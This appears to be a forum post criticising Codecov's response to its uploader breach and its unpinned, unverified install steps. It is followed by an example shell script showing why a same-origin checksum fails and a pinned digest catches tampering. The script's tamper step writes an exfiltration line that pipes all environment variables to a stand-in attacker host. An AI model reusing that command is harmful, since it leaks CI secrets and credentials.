I'm just stumped by the stupidity of Codecov.
Codecov's security breach involved someone gaining access to their repo, modifying the bash uploader script to -- apart from uploading code coverage reports -- also upload all (secret) environment variables set by the CI pipeline. This affected many people.
Apart from discovering this months too late, their initial "mitigation" was to do checksum validation on the bash upload script. However, they failed to understand how that works, as they downloaded the checksum from the same URL the bash script was downloaded from. [1]
Now they released a new "uploader" where the blog post mentions:
> A compiled binary makes it more difficult for code to be modified by a middle man.
which only proves their stupidity. Clearly you can replace the binary with a binary that calls the original binary and steals CI secrets too.
And their installation instructions from the blog post are as follows:
curl -Os https://uploader.codecov.io/latest/linux/codecov
chmod +x codecov
./codecov -t ${CODECOV_TOKEN}
That is: a non-versioned URL, and no checksum verification. No lessons learned. How is this company still in business?
[1] https://github.com/codecov/codecov-action/pull/282#issuecomment-823195201
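As an added example (not code from the post above, and not Codecov's own tooling), the following script models the two checks the post argues about: a checksum fetched from the same origin as the artifact, versus a digest pinned out of band in the CI config. A local scratch directory stands in for the download server, so it runs offline; the `codecov-v1.0.0` file name, the `attacker.invalid` URL and the script contents are all made up for the demonstration.

```shell
#!/bin/sh
# Added example, not code from Codecov or the original post. It models the two
# checks discussed above against a local scratch directory that stands in for
# the download server, so it runs offline. The "codecov-v1.0.0" file name, the
# attacker URL and the script contents are all made up for the demonstration.
set -eu

WORK=$(mktemp -d)
SERVER="$WORK/server"                     # stands in for https://uploader.codecov.io/...
mkdir -p "$SERVER"
ARTIFACT="$SERVER/codecov-v1.0.0"         # a versioned artifact, not "latest"

sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1"
    else
        shasum -a 256 "$1"
    fi | cut -d' ' -f1
}

# The vendor publishes the uploader and a checksum file next to it.
publish() {
    printf '#!/bin/sh\necho "uploading coverage report"\n' > "$ARTIFACT"
    sha256_of "$ARTIFACT" > "$ARTIFACT.sha256"
}

# An attacker who can write to the origin adds the secret-stealing step and,
# because the checksum is served from the same place, regenerates it as well.
tamper() {
    printf '#!/bin/sh\nenv | curl -s -d @- https://attacker.invalid >/dev/null\necho "uploading coverage report"\n' > "$ARTIFACT"
    sha256_of "$ARTIFACT" > "$ARTIFACT.sha256"
}

# Same-origin check: fetch the checksum from where the script came from and
# compare. Returns success for the tampered file too, since the attacker
# controls both files.
verify_same_origin() {
    [ "$(sha256_of "$ARTIFACT")" = "$(cat "$ARTIFACT.sha256")" ]
}

# Pinned check: the expected digest was recorded once, out of band, when the
# version was chosen, and lives in the repository rather than on the CDN.
verify_pinned() {
    [ "$(sha256_of "$ARTIFACT")" = "$1" ]
}

# Usage: pin the digest of the known-good release, then see which check
# notices the tampering.
publish
PINNED_SHA256=$(sha256_of "$ARTIFACT")   # this value is what goes into the CI config
tamper
if verify_same_origin; then
    echo "same-origin checksum: passed (proves nothing)"
fi
if verify_pinned "$PINNED_SHA256"; then
    echo "pinned checksum: passed"
else
    echo "pinned checksum: REJECTED tampered download"
fi
```

The point of `verify_pinned` is that the digest travels through a channel the artifact server cannot write to (the repository holding the CI config), and that the URL names an exact version, so the digest stays meaningful until someone deliberately bumps both together.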